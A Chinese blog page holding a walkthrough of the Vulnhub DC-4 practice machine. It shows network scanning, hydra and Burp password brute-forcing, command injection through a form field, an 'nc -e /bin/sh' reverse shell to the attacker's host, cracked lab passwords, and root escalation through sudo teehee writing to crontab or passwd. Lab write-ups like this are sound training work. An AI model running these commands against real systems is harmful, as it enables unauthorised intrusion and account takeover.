<!--
	作者：Sariay
	时间：2018-09-25
	描述：There may be a bug, but don't worry, QiLing(器灵) says that it can work normally!
-->
<!DOCTYPE html>
<html class="html-loading">
		

<head><meta name="generator" content="Hexo 3.9.0">
	<meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <title>
    
      Vulnhub DC-4 | ST0new Blog
    
  </title>
  <meta name="author" content="ST0new">
  <meta name="keywords" content>
  <meta name="description" content="博观而约取，厚积而薄发">
	<!-- favicon -->
  <link rel="shortcut icon" href="/img/favicon.ico">

  <!-- css -->
  <link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="stylesheet" href="/css/Annie.css">
  
  <!-- jquery -->
	<script src="/js/jquery.min.js"></script>

  <!-- leancloud -->
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
<script src="/js/leancloud.js"></script>
</head>
	<body>
		<!-- Preloader -->

	<div id="preloader">
		<div class="pre-container">
			
				<div class="spinner">
					<div class="double-bounce1"></div>
					<div class="double-bounce2"></div>
				</div>
						
		</div>
	</div>


<!-- header -->
<header class="fixbackground" data-img-mode="random" data-normal-src="/img/1.jpg" data-random-max="110" data-random-src="https://sariay.github.io/Random-img/">
	<div class="mask">
		<!-- Logo and navigation -->
		<div class="h-header">
			<div id="logo">
				<a href="/">
						
						<img src="/img/logo.png" alt="Logo">
					
				</a>
			</div>
			
			<div id="navigation-show">
				<ul>
	
		<li class="menu-home">
			<a href="/" class="menu-item-home">主页</a>
		</li>
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive">归档</a>
		</li>
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories">分类</a>
		</li>
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags">标签</a>
		</li>
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about">关于</a>
		</li>
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery">相册</a>
		</li>
	

	
</ul>
			</div>				
		</div>

		<!-- motto -->
		<div class="h-body">	
			
				<p class="motto"></p>
			
		</div>
		
		<!-- others: such as time... -->			
		<div class="h-footer">
			<a href="javascript:;" id="read-more"><i class="fa fa-angle-double-down" aria-hidden="true"></i>
			</a>

			
				<!-- 
	This is only a demo, please go to "https://time.is" to set your city time! 
-->
<style type="text/css">
	.header-date {
		font-size: 1.6rem;
		color: #fff;
		position: absolute;
		bottom: 5px;
		right: 1rem;
		writing-mode: tb-rl;
	}	
	
	.header-date a {
		border-bottom: none;
	}

	@media only screen and (max-width: 768 ) {
		.header-date {
			font-size: 1rem;
		}			
	}
</style>
<div class="header-date">
	<a href="https://time.is/Beijing" id="time_is_link" rel="nofollow" ></a>
	<span id="Beijing_z43d"></span>
</div>
<script src="//widget.time.is/zh.js"></script>
<script>
	time_is_widget.init({
		Beijing_z43d:{
			template:"DATE", 
			date_format:"year年 monthname dnum日"
		}
	});
</script>
			
		</div>
	</div>
</header>

<div id="navigation-hide">
	<!-- Progress bar -->
	<div id="progress-bar"></div>

	<!-- Progress percent -->
	<div id="progress-percentage"><h1>0.0%</h1></div>

	<div class="toc-switch"><span class="switch-button">目录</span></div>

	<!-- Page title -->
	<p>
		
			当前文章&nbsp;:&nbsp;《Vulnhub DC-4》
		
	</p>

	<!-- Nav trigger for navigation-H-->
	<a class="nav-trigger"><span></span></a>
</div>

<!-- Navigation in div(id="navigation-H") -->
<nav class="nav-container" id="cd-nav">
	<div class="nav-header">
		<h3>Navigation</h3>
		<a href="javascript:;" class="nav-close"></a>
	</div>
	<div class="nav-body">
		<ul>
	
		<li class="menu-home">
			<a href="/" class="menu-item-home">主页</a>
		</li>
	
		<li class="menu-archive">
			<a href="/archives" class="menu-item-archive">归档</a>
		</li>
	
		<li class="menu-categories">
			<a href="/categories" class="menu-item-categories">分类</a>
		</li>
	
		<li class="menu-tags">
			<a href="/tags" class="menu-item-tags">标签</a>
		</li>
	
		<li class="menu-about">
			<a href="/about" class="menu-item-about">关于</a>
		</li>
	
		<li class="menu-gallery">
			<a href="/gallery" class="menu-item-gallery">相册</a>
		</li>
	

	
</ul>
	</div>
	<div class="nav-footer">
		<ul>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-github"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-weibo"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-pinterest"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-instagram"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-twitter"></i>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<i class="fa fa-rss"></i>
			</a>
		</li>
			
</ul>

	</div>
</nav>
			
		<!--main-->
		<main>
			<!--
	时间：2018-11-17
	描述：
		插件名称：katelog.min.js
		插件作者：KELEN
		插件来源: https://github.com/KELEN/katelog
-->

	
		<div class="layout-toc">
			<div id="layout-toc">
				<div class="k-catelog-list" id="catelog-list" data-title="文章目录"></div>
			</div>
		</div>

		
		<script src="/plugin/toc/katelog.min.js"></script>

		
	 

<div class="layout-post">
	<div id="layout-post">
	<div class="article-title">
		<i class="fa fa-paper-plane-o" aria-hidden="true"></i>
		
	<a href="/2019/10/04/靶机/Vulnhub DC-4/" itemprop="url">
		Vulnhub DC-4
	</a>

	</div>

	<div class="article-meta">
		<span>
			<i class="fa fa-calendar"></i>
			


	发布于

	<a href="/2019/10/04/靶机/Vulnhub DC-4/" itemprop="url">
		<time datetime="2019-10-04T03:02:24.000Z" itemprop="datePublished">
	  		2019-10-04
	  </time>
	</a>
	&nbsp;





			




	更新于

	<a href="/2019/10/04/靶机/Vulnhub DC-4/" itemprop="url">
		<time datetime="2019-10-04T03:02:24.000Z" itemprop="dateUpdated">
	  		2019-10-04
	  </time>
	</a> 



		</span>
		<span>
			<i class="fa fa-tags"></i>
			
	
		<a href="/tags/远程命令执行/" class=" ">
			远程命令执行
		</a>
	
		
		</span>
		
		



	</div>

	<div class="article-content" id="article-content">
		<p>熟悉提权步骤，和漏洞发现</p>
<a id="more"></a>





<h1 id="Vulnhub-之-DC-4"><a href="#Vulnhub-之-DC-4" class="headerlink" title="Vulnhub 之 DC-4"></a>Vulnhub 之 DC-4</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>DC已经做了一半了，前三次都是基于初学者的，这次的难度就提升了，适合初学者和入</p>
<p>门的伙伴。</p>
<p>还是按照常例看看作者是怎么描述的吧。</p>
<h2 id="下载地址"><a href="#下载地址" class="headerlink" title="下载地址"></a>下载地址</h2><h2 id="描述"><a href="#描述" class="headerlink" title="描述"></a>描述</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">DC-4是另一个专门建造的脆弱实验室，目的是获得渗透测试领域的经验。</span><br><span class="line"></span><br><span class="line">与以前的DC版本不同，这个版本主要是为初学者/中间用户设计的。只有一面旗帜，但技术上来说，有多个入口，就像上次一样，没有线索。</span><br><span class="line"></span><br><span class="line">必须具备Linux技能和熟悉Linux命令行，就像一些基本渗透测试工具的经验一样。</span><br><span class="line"></span><br><span class="line">对于初学者来说，谷歌可能会有很大的帮助，但是你可以随时在@DCAU7发推给我寻求帮助，让你重新开始。但是请注意:我不会给你答案，相反，我会给你一个如何前进的想法。</span><br></pre></td></tr></table></figure>

<p>所以说，谷歌真的很万能。O(∩<em>∩)O哈哈~</em></p>
<h2 id="靶机环境"><a href="#靶机环境" class="headerlink" title="靶机环境"></a>靶机环境</h2><p>记得修改DC-4的网络为NAT模式</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">kali : 192.168.248.130</span><br><span class="line"></span><br><span class="line">DC-4 : 192.168.248.128</span><br></pre></td></tr></table></figure>

<h2 id="靶机复现"><a href="#靶机复现" class="headerlink" title="靶机复现"></a>靶机复现</h2><ul>
<li><p>扫描网段</p>
<p><code>nmap -sn 192.168.248.0/24</code></p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721142149.png" alt></p>
<p>发现目标ip ： 192.168.248.128</p>
</li>
<li><p>扫描端口</p>
<p><code>nmap -sS 192.168.248.128</code></p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721143438.png" alt></p>
</li>
<li><p>尝试爆破ssh</p>
<p><code>hydra  -l root -P /root/Desktop/weakpass.txt -t 5 ssh://192.168.248.128</code></p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721144835.png" alt></p>
<p>一般破解需要时间所以我就做一个演示</p>
</li>
<li><p>网站搜寻线索</p>
<p>发现是一个登录框，</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721145420.png" alt></p>
<p>并且没有登录限制，尝试爆破</p>
<p>可以使用hydra爆破，这里我使用burp做测试</p>
<p>设置为<code>Cluster bomb</code>,用户给admin和root ，密码采用弱口令字典这个网上挺多的，或者使用hydra的默认字典也可以，然后线程跑高点 ， 我这里给burp设置的20，大概不到一分钟就出来了。</p>
</li>
</ul>
<p>  <img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721151611.png" alt></p>
<p>  这里只要登录成功后之后的登录都是636了</p>
<ul>
<li><p>登录发现</p>
<p>有三个命令可以运行，然后抓包查看发现可以在radio这块执行了系统命令，那么是否可以执行其他的命令</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721161839.png" alt></p>
<p>尝试执行<code>whoami</code></p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721162107.png" alt></p>
<p>既然可以执行一些简单的命令，我们就可以尝试去反弹shell</p>
<p>命令：<code>nc -e /bin/sh 192.168.248.130 4444</code></p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721162638.png" alt></p>
<p>获取交互模式</p>
<p>命令：<code>python -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</code></p>
<p>之后在home的jim目录下发现了一个旧密码的备份</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721163345.png" alt></p>
<p>或许可以尝试用它去爆破ssh</p>
<p>命令：<code>chydra  -L /root/Desktop/user.txt -P /root/Desktop/dc_pass.txt -t 5 ssh://192.168.248.128</code></p>
<p>等待是漫长的，要有耐心</p>
<p>终于出来了一个  用户名：<code>jim</code> 密码：<code>jibril04</code><br><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721172645.png" alt></p>
<p>切换到jim用户下，打开mbox查看</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721165049.png" alt></p>
<p>有邮件，去mail下查看，发现了jim文件获取到jim的密码</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721165234.png" alt></p>
</li>
<li><p>登录charles</p>
<p>密码： <code>^xHhA&amp;hvim0y</code></p>
<p>命令：<code>sudo -l</code>查看权限 发现可以不需要密码执行teehee</p>
<p>百度得到提权方式</p>
<p>1 通过teehee的sudo提升权限以 root身份写入crontab计划任务通过执行获取root权限</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721171456.png" alt></p>
<p>2 还有个2呢，多个想法多个活路</p>
<p>通过添加用户到passwd，设置其权限，之后su 访问即可获得root</p>
<p><img src="https://raw.githubusercontent.com/ST0new/picture/master/2019/7/21/20190721171755.png" alt></p>
<p>所以，最好不要给用户sudo权限，或者限制sudo权限的，这样才能保证网络安全</p>
</li>
</ul>
<h2 id="结束语"><a href="#结束语" class="headerlink" title="结束语"></a>结束语</h2><p>今天的靶机奉上各位看官，过程简单，主要掌握提权的思路和前期爆破的等待。</p>
	
	</div>
	
	<div id="current-post-cover" data-scr="/img/cart_cover.jpg"></div>

	<!-- relate post, comment...-->
	<div class="investment-container">
		<div class="investment-header">
			<div class="investment-title-1">
				<div class="on">相关文章</div>
				<div>评论</div>
				<div>分享</div>
			</div>
			<div class="investment-title-2">	            
				
	<span>
		<a href="javascript: window.scrollTo(0, 0);">返回顶部</a>
		
			<a href="/2019/10/04/靶机/Vulnhub DC-5 /" title="DC-5 复现" rel="prev">
				&laquo;上一篇
			</a>
		
		
			<a href="/2019/10/04/靶机/Vulnhub DC-3/" title="Vulnhub之DC-3 joomla注入和ubutnu16.04 提权" rel="next">
				下一篇&raquo;
			</a>
			
	</span>


      		
			</div>	
		</div>
		
		<div class="investment-content">
			<div class="investment-content-list">
				

<div class="relate-post">
	
		<ul>
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/靶机/Vulnhub DC-6/" title="Vulnhub 之 DC-6 靶机复现">
								Vulnhub 之 DC-6 靶机复现			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								掌握nmap，sudo 提权方式


[TOC]
Vulnhub 之 DC-6 靶机复现前言本靶机仅供学习使用，请不要用于其他路径，作者不承担任何法律责任
终于打到dc的最后一个靶机了，花了几个月的闲暇时间来试试，越到后面靶机的难度就...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/靶机/Vulnhub DC-6/" title="Vulnhub 之 DC-6 靶机复现">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="Vulnhub 之 DC-6 靶机复现"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/靶机/Vulnhub DC-5 /" title="DC-5 复现">
								DC-5 复现			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								掌握利用各种root权限的环境提权


Vulnhub 之 DC-5 靶机复现前言本靶机只做学习使用，不要将其利用于非法途径。
终于来到了倒数第二关，这一关将难度增加，所以我们需要借助搜索工具来帮助我们完成
作者描述123456789...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/靶机/Vulnhub DC-5 /" title="DC-5 复现">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="DC-5 复现"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/靶机/Vulnhub DC-3/" title="Vulnhub之DC-3 joomla注入和ubutnu16.04 提权">
								Vulnhub之DC-3 joomla注入和ubutnu16.04 提权			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								常见cms漏洞 和系统版本提权


Vulnhub靶机之DC-3前言
 刚考完试，然而不能放弃对技术的热爱，又重新拾起了dc准备把他们6个做完  
 今天介绍的是dc-3 ，来看看作者对他的评价

123456789101112描述：...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/靶机/Vulnhub DC-3/" title="Vulnhub之DC-3 joomla注入和ubutnu16.04 提权">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="Vulnhub之DC-3 joomla注入和ubutnu16.04 提权"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/靶机/Vulnhub DC-2/" title="Vulnhub DC-2">
								Vulnhub DC-2			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								掌握工具和提权方式


前言关于Vulnhub  以及DC，以及如何使用ova安装，我已经在DC-1中介绍了 ，今天带来第二弹，比第一弹难度稍微大一点，重点还是考察工具的使用和命令的熟练程度附上链接Vulnhub DC Challen...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/靶机/Vulnhub DC-2/" title="Vulnhub DC-2">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="Vulnhub DC-2"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/靶机/Vulnhub DC-1/" title="Vulnhub之DC-1 find 提权骚思路">
								Vulnhub之DC-1 find 提权骚思路			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								DC-1 学习


Vulnhub简介Vulnhub是一个提供各种漏洞环境的靶场平台，供安全爱好者学习渗透使用，大部分环境是做好的虚拟机镜像文件，镜像预先设计了多种漏洞，需要使用VMware或者VirtualBox运行。每个镜像会有破...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/靶机/Vulnhub DC-1/" title="Vulnhub之DC-1 find 提权骚思路">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="Vulnhub之DC-1 find 提权骚思路"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/CTF介绍/" title="CTF介绍">
								CTF介绍			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								刚开始接触CTF,对于misc，reverse等等都傻傻分不清，所以专门去查了下这些名词，给没有接触CTF的童鞋一点入门基础.


前言刚开始接触CTF,对于misc，reverse等等都傻傻分不清，所以专门去查了下这些名词，给没有接...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/CTF介绍/" title="CTF介绍">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="CTF介绍"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/DVWA 如何查看登录密码并修改/" title="DVWA 查看默认密码">
								DVWA 查看默认密码			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								如何数据库查看dvwa的密码，跳过密码验证


前言今天登录dvwa的时候发现密码错误，尝试了我自己常设置的密码后都没有结果，就决定去数据库查看dvwa的密码。话不多说，直接开始操作
dvwa默认密码如果小伙伴们只需要dvwa的默认密...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/DVWA 如何查看登录密码并修改/" title="DVWA 查看默认密码">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="DVWA 查看默认密码"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/web安全/sql注入/DVWA 之SQL Injection/" title="DVWA 之SQL Injection">
								DVWA 之SQL Injection			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								SQL注入就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令


前言本文属于学习贴，我自己在学习的时候总结的，如有错误，请大家及时指出

dvwa v1.0.7

何为S...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/web安全/sql注入/DVWA 之SQL Injection/" title="DVWA 之SQL Injection">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="DVWA 之SQL Injection"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/Markdown语法介绍/" title="Markdown编辑器语法">
								Markdown编辑器语法			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								Markdown是一种轻量级标记语言,它允许人们“使用易读易写的纯文本格式编写文档，然后转换有效的XHTML或者HTML文档”，这种语言吸收了很多电子邮件中已有的纯文本标记的特性。


前言为什么要写博客
先谈论一个话外题，为什么选择...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/Markdown语法介绍/" title="Markdown编辑器语法">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="Markdown编辑器语法"/>
							</a>
						</div>
					</li>											
			
			
					<li>
						<div class="relate-post-text">
							<a class="relate-post-title" href="/2019/10/04/实用技巧/OWASP TOP 10/" title="OWASP Top 10简要介绍">
								OWASP Top 10简要介绍			
							</a>
							<p class="relate-post-date">
								<i class="fa fa-calendar"></i>
								十月 4日, 2019				
							</p>
							<p class="relate-post-content">
								为了加深对owasp top 10 的印象 ，写一篇作为记录


前言
最近在找实习，看到招聘全是要求熟悉OWASP Top 10,为了加深印象所以写一个博客记录一下 ,也希望可以为有相同需求的小伙伴提供好的资料,之后我会陆续更新相关...
							</p>
						</div>

						<div class="relate-post-cover">
							<a href="/2019/10/04/实用技巧/OWASP TOP 10/" title="OWASP Top 10简要介绍">				
								
								<img class="lazy" src="/img/placeholder.jpg" data-src="/img/cart_cover.jpg" alt="OWASP Top 10简要介绍"/>
							</a>
						</div>
					</li>											
			
			
		</ul>
	
</div>	
			</div>
			<div class="investment-content-list">
				<div class="layout-comment">

	

		

			<!-- I don't know !!!-->
			<div>Please check the comment setting in config.yml of hexo-theme-Annie!</div>
			
		
		
	

</div>
			</div>
			<div class="investment-content-list">
				<div class="layout-share">
	
	

		
			
			<!-- socialShare share -->
			<div class="social-share"></div>

<!--  css & js -->
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/css/share.min.css">
<script async src="https://cdnjs.cloudflare.com/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script>
			
		
		
	
</div>


			</div>
		</div>	
	</div>
	</div>
</div>



	<!-- leancloud -->
	<!--
	时间：2018-11-27
	描述：
		文章访问量：visitors
		文章喜欢量：likes	
		文章排行榜：topNPost
		其他得说明：
			01-Cookie相关的函数 
				https://blog.csdn.net/somehow1002/article/details/78511541（Author：somehow1002）
			02-visitors相关的函数 
				https://blog.csdn.net/u013553529/article/details/63357382（Author：爱博客大伯）
				https://notes.doublemine.me/2015-10-21-为NexT主题添加文章阅读量统计功能.html（Author：夏末）
			03-topNPost相关的函数
				https://hoxis.github.io/hexo-next-read-rank.html（Author：hoxis）
			04-likes相关的函数，
				参考了01 & 02进行简单的设计与实现
-->


	


<!-- show math formula -->



	 
	<script src="/plugin/clipboard/clipboard.js"></script>
	<script>
		// Copy code !
	    function codePreprocessing() {
	        $("#article-content .highlight").each(function() {

	            $(this).wrap('<div id="post-code"></div>');

	        })

	        $("#article-content #post-code").each(function() {

	            $(this).prepend('<nav class="copy-nav"><span><i class="code-language"></i></span></nav>');

	        })

	        $("#article-content .copy-nav").each(function() {
	            var temp = $(this).next().attr('class'),
	                language = ((temp.length > 9) && (temp != null)) ? temp.substr(10) : "none"; //why 9? Need to check language?

	            $(this).find('.code-language').text(language);

	            $(this).append('<span class="copy-btn"><i class="fa fa-copy" aria-hidden="true"></i></span>');

	        });
	    }

		function codeCopy() {
		    $('#article-content #post-code').each(function(i) {
		        var codeCopyId = 'codeCopy-' + i;

		        var codeNode = $(this).find('.code'),
		            copyButton = $(this).find('.copy-btn');

		        codeNode.attr('id', codeCopyId);
		        copyButton.attr('data-clipboard-target-id', codeCopyId);
		    })

		    
			var clipboard = new ClipboardJS('.copy-btn', {
					target: function(trigger) {
						return document.getElementById(trigger.getAttribute('data-clipboard-target-id'));
					}
		      	});

			//pure js
			function showTooltip(elem, msg) {		   
				elem.setAttribute('aria-label', msg);
				elem.setAttribute('class', 'copy-btn copy-status');
				setTimeout(function() {
					elem.setAttribute('class', 'copy-btn');
				}, 2000);
			}

			clipboard.on('success', function(e) {
			    e.clearSelection();
			    console.info('Action:', e.action);		   
			    console.info('Trigger:', e.trigger);
			    showTooltip(e.trigger, 'Copied!');
			    
			});
			clipboard.on('error', function(e) {
			    console.error('Action:', e.action);
			    console.error('Trigger:', e.trigger);
			});
		

		}

		if ($('.layout-post').length) {
		    codePreprocessing();
		    codeCopy();
		} 
	</script>





<link rel="stylesheet" href="/plugin/fancybox/jquery.fancybox.css">
<script src="/plugin/fancybox/jquery.fancybox.js"></script>

<script type="text/javascript">
	var titleID = $('.article-title a'),
		imageID = $('.article-content img'),
		videoID = $('.article-content video');

	var postTitle = titleID.text() ? titleID.text() : "No post title!";

	imageID.each(function() {
		var imgPath = $(this).attr('src'),
			imgTitle = $(this).attr('alt') ? $(this).attr('alt') : "No image description!";

		//给每个匹配的<img>元素打包, 即添加父元素<a>
		$(this).wrap('<a data-fancybox="gallery" data-caption=" 《 ' + postTitle + ' 》 ' + imgTitle + ' "  href=" ' + imgPath + ' "> </a>');
	});

	videoID.each(function() {
		var videoPath = $(this).attr('src');

		//给每个匹配的<img>元素打包, 即添加父元素<a>
		$(this).wrap('<a data-fancybox href=" ' + videoPath + ' "> </a>');
	});
	//TODO：支持html5 video

	if($('#layout-post').length) {
		$('[data-fancybox="gallery"]').fancybox({
			loop: true,
			buttons: [
				"zoom",
				"share",
				"slideShow",
				"fullScreen",
				//"download",
				"thumbs",
				"close"
			],
			protect: false
		});
	}
</script>
		</main>

		<!--footer-->
		<footer>
	<div class="social">
		<ul>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-github"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-weibo"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-pinterest"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-instagram"></i>
			</a>
		</li>
	
		<li>
			<a href="http://github.com/" target="_blank">
				<i class="fa fa-twitter"></i>
			</a>
		</li>
	
		<li>
			<a href="/atom.xml" target="_blank">
				<i class="fa fa-rss"></i>
			</a>
		</li>
			
</ul>

	</div>
		
	<div class="copyright">
		<p>
			 
				&copy;2017 - 2019, content by ST0new. All Rights Reserved.
			
			
			

	<!-- busuanzi -->
	<!-- busuanzi -->

		
	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	

		<span id="busuanzi_container_page_pv">
	  		本文总阅读量<span id="busuanzi_value_page_pv"></span>次
		</span>

	




		</p>
		<p>
			<a href="http://hexo.io/" title="Hexo" target="_blank" rel="noopener">Hexo</a> Theme <a href="https://github.com/Sariay/hexo-theme-Annie" title="Annie" target="_blank" rel="noopener">Annie</a> by Sariay.
			<a href="javascript:zh_tran('s');" class="zh_click" id="zh_click_s">简体</a> 
			<a href="javascript:zh_tran('t');" class="zh_click" id="zh_click_t">繁體</a>				
		</p>
	</div>		
</footer>
		
	<!-- set '1' to show motto in all pages! -->

	<script src="/plugin/motto/motto.js"></script>
	
	<script type="text/javascript">
		$(".motto").html( getMingYanContent() );
	</script>	





<!-- love effect -->

	<script src="/plugin/love/love.js"></script>


<!-- back to top -->

	
	<div id="totop">
  		<a href="javascript:;"  name="TOTOP" class="fa fa-arrow-up" ></a>
	</div>




<!-- site analysis -->


	<!-- site-analysis -->
	
	
	
	
	
 

<script src="/plugin/vibrant/vibrant.js"></script>
<script src="/plugin/chinese/chinese.js"></script>
<script src="/plugin/imgLazyLoader/yall.min.js"></script>
<script src="/plugin/imgResize/jquery.resizeimagetoparent.min.js"></script>
<script src="/plugin/nicescroll/jquery.nicescroll.js"></script>
<script src="/js/resizediv.js"></script>
<script src="/js/main.js"></script>
	</body>	
</html>